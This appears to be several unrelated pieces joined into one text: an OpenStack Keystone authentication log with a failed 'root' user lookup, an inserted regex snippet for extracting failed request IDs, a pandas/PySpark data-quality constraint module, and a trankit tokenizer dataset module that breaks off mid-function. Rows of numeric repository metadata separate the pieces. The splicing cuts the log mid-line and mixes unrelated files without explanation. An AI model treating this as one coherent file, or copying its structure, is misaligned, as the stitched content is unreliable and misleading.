2017-07-30 17:20:24.228 3280 INFO keystone.common.wsgi [req-e34f17f4-4957-4117-a174-73fb8de19d29 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:24.293 3280 WARNING keystone.common.wsgi [req-e34f17f4-4957-4117-a174-73fb8de19d29 - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:29.055 3278 INFO keystone.common.wsgi [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] Could not find user: root
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core Traceback (most recent call last):
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/auth/plugins/core.py", line 173, in _validate_and_normalize_auth_data
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core user_name, domain_ref['id'])
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/common/manager.py", line 124, in wrapped
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core __ret_val = __f(*args, **kwargs)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 433, in wrapper
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return f(self, *args, **kwargs)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 443, in wrapper
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return f(self, *args, **kwargs)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 1053, in decorate
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core should_cache_fn)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 657, in get_or_create
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core async_creator) as value:
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 158, in __enter__
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return self._enter()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 98, in _enter
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core generated = self._enter_create(createdtime)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/core/dogpile.py", line 149, in _enter_create
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core created = self.creator()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 625, in gen_value
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core created_value = creator()
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/dogpile/cache/region.py", line 1049, in creator
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core return fn(*arg, **kw)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/core.py", line 902, in get_user_by_name
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core ref = driver.get_user_by_name(user_name, domain_id)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core File "/usr/lib/python2.7/dist-packages/keystone/identity/backends/sql.py", line 253, in get_user_by_name
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core raise exception.UserNotFound(user_id=user_name)
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core UserNotFound: Could not find user: root
2017-07-30 17:20:29.083 3278 ERROR keystone.auth.plugins.core
2017-07-30 17:20:29.089 3278 WARNING keystone.common.wsgi [req-98982a97-90ca-411f-843d-c4dd5186fe5a - - - - -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:35.852 3279 INFO keystone.common.wsgi [req-2b0ef7e5-a560-4bdd-9815-a7b554fbebb6 - - - - -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:35.957 3279 INFO keystone.token.providers.fernet.utils [req-2b0ef7e5-a560-4bdd-9815-a7b554fbebb6 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:35.967 3280 INFO keystone.token.providers.fernet.utils [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.010 3280 INFO keystone.common.wsgi [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:36.016 3280 INFO keystone.token.providers.fernet.utils [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.097 3280 WARNING keystone.common.wsgi [req-299cb3c0-2c36-492d-92d7-4d50f0e5ed55 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Authorization failed. The request you have made requires authentication. from 172.16.1.5
2017-07-30 17:20:36.108 3278 INFO keystone.common.wsgi [req-4964e49e-5345-4baa-b74a-84198dc9dfb0 - - - - -] GET http://controller:5000/v3/
2017-07-30 17:20:36.120 3277 INFO keystone.token.providers.fernet.utils [req-78b59c40-4bc8-4991-8fcb-f7b66c2513a7 - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.171 3277 INFO keystone.common.wsgi [req-78b59c40-4bc8-4991-8fcb-f7b66c2513a7 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] GET http://controller:5000/v3/users/63dee1ed626b4040bcd43b3492997a8c/projects
2017-07-30 17:20:36.219 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.263 3278 INFO keystone.common.wsgi [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] POST http://controller:5000/v3/auth/tokens
2017-07-30 17:20:36.277 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:36.388 3278 INFO keystone.token.providers.fernet.utils [req-8487814f-ba80-4ecd-a691-f9d7185e11be 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:37.038 3281 INFO keystone.token.providers.fernet.utils [req-409620fb-dd6b-493a-9b9f-259943f1564b - - - - -] Loaded 2 encryption keys (max_active_keys=3) from: /etc/keystone/fernet-keys/
2017-07-30 17:20:37.098 3281 INFO keystone.common.wsgi [req-409620fb-dd6b-493a-9b9f-259943f1564b 63dee1ed626b4040bcd43b3492997a8c - - 19b6c35443a340c5a8648c97c46fdff7 -] GET http://controller:5000/v3/users/63dee1ed626b4040bcd43b
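A minimal, hedged sketch (not part of the log; the filename keystone.log is assumed) of extracting the request IDs that failed authorization from entries in the format above:
import re
with open("keystone.log") as f:
    failed = re.findall(r"\[(req-[0-9a-f-]+)[^\]]*\] Authorization failed", f.read())
print(failed)  # e.g. ['req-b28d7cf9-8591-4629-99a1-bdcd85b046b4', ...]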
| 157.62963
| 264
| 0.777491
| 1,398
| 8,512
| 4.690987
| 0.158798
| 0.049405
| 0.065874
| 0.082342
| 0.907594
| 0.89875
| 0.81351
| 0.801311
| 0.754498
| 0.706008
| 0
| 0.280758
| 0.089051
| 8,512
| 54
| 265
| 157.62963
| 0.564999
| 0
| 0
| 0.037037
| 0
| 0.037037
| 0.088688
| 0.088453
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
915e01b808959953019e75202c7852f412df2ba0
| 13,119
|
py
|
Python
|
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | null | null | null |
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | null | null | null |
sdk/python/dq_whistler/constraints/string_type.py
|
nareshbab/dq_whistler
|
dabc761b201e777efe3070222a9c6c40b8848cfb
|
[
"MIT"
] | 4
|
2021-10-04T07:10:06.000Z
|
2021-10-04T07:39:56.000Z
|
from dq_whistler.constraints.constraint import Constraint
from typing import Dict, Union
from pandas.core.series import Series as pandas_df
from pyspark.sql.dataframe import DataFrame as spark_df
import pyspark.sql.functions as f
class Equal(Constraint):
"""
Equal constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"eq",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``eq`` to ``"abc"``, then the dataframe will have rows where
values are ``!= "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name) != self._values
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame != self._values]
class NotEqual(Constraint):
"""
NotEqual constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"nt_eq",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``nt_eq`` to ``"abc"``, then the dataframe will have rows where
values are ``== "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name) == self._values
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame == self._values]
class Contains(Constraint):
"""
Contains constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"contains",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``contains`` ``"abc"``, then the dataframe will have rows where
values ``do not contain "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).contains(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.contains(self._values)]
class NotContains(Constraint):
"""
NotContains constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_contains",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_contains`` ``abc``, then the dataframe will have rows where
values ``contain "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).contains(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.contains(self._values)]
class StartsWith(Constraint):
"""
StartsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"starts_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``starts_with`` ``"abc"``, then the dataframe will have rows where
values ``do not start with "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).startswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.startswith(self._values)]
class NotStartsWith(Constraint):
"""
NotStartsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_starts_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_starts_with`` ``"abc"``, then the dataframe will have rows where
values ``start with "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).startswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.startswith(self._values)]
class EndsWith(Constraint):
"""
EndsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"ends_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``ends_with`` ``"abc"``, then the dataframe will have rows where
values ``do not end with "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).endswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.endswith(self._values)]
class NotEndsWith(Constraint):
"""
NotEndsWith constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_ends_with",
"values": "abc"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_ends_with`` ``"abc"``, then the dataframe will have rows where
values ``end with "abc"`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).endswith(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.str.endswith(self._values)]
class IsIn(Constraint):
"""
IsIn constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"is_in",
"values": ["abc", "xyz"]
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``is_in`` ``["abc", "xyz"]``, then the dataframe will have rows where
values ``are not in ["abc", "xyz"]`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).isin(*self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.isin(self._values)]
class NotIn(Constraint):
"""
NotIn constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"not_in",
"values": ["abc", "xyz"]
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``not_in`` ``["abc", "xyz"]``, then the dataframe will have rows where
values ``are in ["abc", "xyz"]`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
f.col(self._column_name).isin(*self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[data_frame.isin(self._values)]
class Regex(Constraint):
"""
Regex constraint class that extends the base Constraint class
Args:
constraint (:obj:`Dict[str, str]`): The dict representing a constraint config
::
{
"name":"regex",
"values": "^[A-Za-z]$"
}
column_name (:obj:`str`): The name of the column for constraint check
"""
def __init__(self, constraint: Dict[str, str], column_name: str):
super().__init__(constraint, column_name)
def get_failure_df(self, data_frame: Union[spark_df, pandas_df]) -> Union[spark_df, pandas_df]:
"""
Args:
data_frame (:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`): Column data
Returns:
:obj:`pyspark.sql.DataFrame` | :obj:`pandas.core.series.Series`: The dataframe with ``invalid cases``
as per the constraint for ex: if constraint is ``regex`` ``^[A-Za-z]$``, then the dataframe will have rows where
values ``do not`` satisfy the regex ``^[A-Za-z]$`` (i.e. only invalid cases)
"""
if isinstance(data_frame, spark_df):
return data_frame.filter(
~f.col(self._column_name).rlike(self._values)
)
if isinstance(data_frame, pandas_df):
return data_frame[~data_frame.str.match(pat=self._values)]
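# Hedged usage sketch, not part of the original module; it assumes the base
# Constraint class binds the config's "values" entry to self._values, as
# every subclass above relies on.
import pandas as pd
series = pd.Series(["abcdef", "xyz", "abc"])
check = Contains({"name": "contains", "values": "abc"}, column_name="col")
print(check.get_failure_df(series))  # only the invalid rows remain: "xyz"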
| 32.472772
| 120
| 0.696928
| 1,840
| 13,119
| 4.777174
| 0.050543
| 0.07884
| 0.041866
| 0.045051
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0.93595
| 0
| 0
| 0.16236
| 13,119
| 403
| 121
| 32.55335
| 0.799891
| 0.687781
| 0
| 0.573913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.191304
| false
| 0
| 0.043478
| 0
| 0.521739
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
9172c8d7400a97722290597316877f0b875f8b11
| 9,788
|
py
|
Python
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 613
|
2021-01-12T14:21:13.000Z
|
2022-03-29T19:51:47.000Z
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 38
|
2021-01-13T12:01:15.000Z
|
2022-03-31T14:13:44.000Z
|
trankit/iterators/tokenizer_iterators.py
|
jsteggink/trankit
|
61ef593999bfa29751990d0d4bcf259daed05db4
|
[
"Apache-2.0"
] | 77
|
2021-01-13T07:33:26.000Z
|
2022-03-29T19:51:50.000Z
|
from . import *
# for sents
instance_fields = [
'paragraph_index',
'wordpieces', 'wordpiece_labels', 'wordpiece_ends',
'piece_idxs', 'attention_masks', 'token_type_idxs',
'wordpiece_num'
]
batch_fields = [
'paragraph_index',
'wordpieces', 'wordpiece_labels', 'wordpiece_ends',
'piece_idxs', 'attention_masks', 'token_type_idxs',
'wordpiece_num'
]
Instance = namedtuple('Instance', field_names=instance_fields)
Batch = namedtuple('Batch', field_names=batch_fields)
class TokenizeDatasetLive(Dataset):
def __init__(self, config, raw_text, max_input_length=512):
self.config = config
self.max_input_length = max_input_length
self.treebank_name = config.treebank_name
self.raw_text = raw_text
self.data = []
self.load_data()
def __len__(self):
return len(self.data)
def __getitem__(self, item):
return self.data[item]
def load_data(self):
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.max_input_length,
plaintext=self.raw_text,
treebank_name=self.config.treebank_name
)
def numberize(self, wordpiece_splitter): # wordpiece tokenizer
data = []
for inst in self.data:
wordpieces = inst['wordpieces']
wordpiece_labels = inst['wordpiece_labels']
wordpiece_ends = inst['wordpiece_ends']
paragraph_index = inst['paragraph_index']
# Pad word pieces with special tokens
piece_idxs = wordpiece_splitter.encode(
wordpieces,
add_special_tokens=True,
max_length=self.max_input_length,
truncation=True
)
assert len(piece_idxs) <= self.max_input_length
pad_num = self.max_input_length - len(piece_idxs)
attn_masks = [1] * len(piece_idxs) + [0] * pad_num
piece_idxs = piece_idxs + [0] * pad_num
# token type idxs: copy each wordpiece's label; positions past the real wordpieces get the ignore index -100
token_type_idxs = [-100 if piece_id >= len(wordpieces) else wordpiece_labels[piece_id] for piece_id in
range(len(piece_idxs) - 2)]
instance = Instance(
paragraph_index=paragraph_index,
wordpieces=wordpieces,
wordpiece_labels=wordpiece_labels,
wordpiece_ends=wordpiece_ends,
piece_idxs=piece_idxs,
attention_masks=attn_masks,
token_type_idxs=token_type_idxs,
wordpiece_num=len(wordpieces)
)
data.append(instance)
self.data = data
def collate_fn(self, batch):
batch_paragraph_index = []
batch_wordpieces = []
batch_wordpiece_labels = []
batch_wordpiece_ends = []
batch_piece_idxs = []
batch_attention_masks = []
batch_token_type_idxs = []
batch_wordpiece_num = []
for inst in batch:
batch_paragraph_index.append(inst.paragraph_index)
batch_wordpieces.append(inst.wordpieces)
batch_wordpiece_labels.append(inst.wordpiece_labels)
batch_wordpiece_ends.append(inst.wordpiece_ends)
batch_piece_idxs.append(inst.piece_idxs)
batch_attention_masks.append(inst.attention_masks)
batch_token_type_idxs.append(inst.token_type_idxs)
batch_wordpiece_num.append(inst.wordpiece_num)
batch_piece_idxs = torch.tensor(batch_piece_idxs, dtype=torch.long, device=self.config.device)
batch_attention_masks = torch.tensor(batch_attention_masks, dtype=torch.long, device=self.config.device)
batch_token_type_idxs = torch.tensor(batch_token_type_idxs, dtype=torch.long, device=self.config.device)
batch_wordpiece_num = torch.tensor(batch_wordpiece_num, dtype=torch.long, device=self.config.device)
return Batch(
paragraph_index=batch_paragraph_index,
wordpieces=batch_wordpieces,
wordpiece_labels=batch_wordpiece_labels,
wordpiece_ends=batch_wordpiece_ends,
piece_idxs=batch_piece_idxs,
attention_masks=batch_attention_masks,
token_type_idxs=batch_token_type_idxs,
wordpiece_num=batch_wordpiece_num
)
class TokenizeDataset(Dataset):
def __init__(self, config, txt_fpath, conllu_fpath, evaluate=False):
self.config = config
self.evaluate = evaluate
self.plaintext_file = txt_fpath
self.conllu_file = conllu_fpath
self.treebank_name = config.treebank_name
self.char_labels_output_fpath = os.path.join(self.config._save_dir, os.path.basename(txt_fpath) + '.character')
self.data = []
self.load_data()
def __len__(self):
return len(self.data)
def __getitem__(self, item):
return self.data[item]
def load_data(self):
if not self.evaluate:
conllu_to_charlevel_format(
plaintext_file=self.plaintext_file,
conllu_file=self.conllu_file,
char_labels_output_fpath=self.char_labels_output_fpath
)
with open(self.plaintext_file, 'r') as f:
plaintext = ''.join(f.readlines())
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.config.max_input_length,
plaintext=plaintext,
treebank_name=self.treebank_name,
char_labels_output_fpath=self.char_labels_output_fpath
)
else:
with open(self.plaintext_file, 'r') as f:
plaintext = ''.join(f.readlines())
self.data = charlevel_format_to_wordpiece_format(
wordpiece_splitter=self.config.wordpiece_splitter,
max_input_length=self.config.max_input_length,
plaintext=plaintext,
treebank_name=self.treebank_name,
char_labels_output_fpath=None
)
print('Loaded {} examples from: \n(i) {}\n(ii) {}'.format(len(self), self.plaintext_file, self.conllu_file))
print('-' * 50)
def numberize(self): # tokenizer: wordpiece tokenizer
data = []
for inst in self.data:
wordpieces = inst['wordpieces']
wordpiece_labels = inst['wordpiece_labels']
wordpiece_ends = inst['wordpiece_ends']
paragraph_index = inst['paragraph_index']
# Pad word pieces with special tokens
piece_idxs = self.config.wordpiece_splitter.encode(
wordpieces,
add_special_tokens=True,
max_length=self.config.max_input_length,
truncation=True
)
assert len(piece_idxs) <= self.config.max_input_length
pad_num = self.config.max_input_length - len(piece_idxs)
attn_masks = [1] * len(piece_idxs) + [0] * pad_num
piece_idxs = piece_idxs + [0] * pad_num
# token type idxs: copy each wordpiece's label; positions past the real wordpieces get the ignore index -100
token_type_idxs = [-100 if piece_id >= len(wordpieces) else wordpiece_labels[piece_id] for piece_id in
range(len(piece_idxs) - 2)]
instance = Instance(
paragraph_index=paragraph_index,
wordpieces=wordpieces,
wordpiece_labels=wordpiece_labels,
wordpiece_ends=wordpiece_ends,
piece_idxs=piece_idxs,
attention_masks=attn_masks,
token_type_idxs=token_type_idxs,
wordpiece_num=len(wordpieces)
)
data.append(instance)
self.data = data
def collate_fn(self, batch):
batch_paragraph_index = []
batch_wordpieces = []
batch_wordpiece_labels = []
batch_wordpiece_ends = []
batch_piece_idxs = []
batch_attention_masks = []
batch_token_type_idxs = []
batch_wordpiece_num = []
for inst in batch:
batch_paragraph_index.append(inst.paragraph_index)
batch_wordpieces.append(inst.wordpieces)
batch_wordpiece_labels.append(inst.wordpiece_labels)
batch_wordpiece_ends.append(inst.wordpiece_ends)
batch_piece_idxs.append(inst.piece_idxs)
batch_attention_masks.append(inst.attention_masks)
batch_token_type_idxs.append(inst.token_type_idxs)
batch_wordpiece_num.append(inst.wordpiece_num)
batch_piece_idxs = torch.tensor(batch_piece_idxs, dtype=torch.long, device=self.config.device)
batch_attention_masks = torch.tensor(batch_attention_masks, dtype=torch.long, device=self.config.device)
batch_token_type_idxs = torch.tensor(batch_token_type_idxs, dtype=torch.long, device=self.config.device)
batch_wordpiece_num = torch.tensor(batch_wordpiece_num, dtype=torch.long, device=self.config.device)
return Batch(
paragraph_index=batch_paragraph_index,
wordpieces=batch_wordpieces,
wordpiece_labels=batch_wordpiece_labels,
wordpiece_ends=batch_wordpiece_ends,
piece_idxs=batch_piece_idxs,
attention_masks=batch_attention_masks,
token_type_idxs=batch_token_type_idxs,
wordpiece_num=batch_wordpiece_num
)
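# Hedged illustration (a self-contained sketch, not trankit code): the padding logic in
# numberize() above -- pad piece ids with zeros and build a matching attention mask.
def pad_to_length(piece_idxs, max_input_length):
    assert len(piece_idxs) <= max_input_length
    pad_num = max_input_length - len(piece_idxs)
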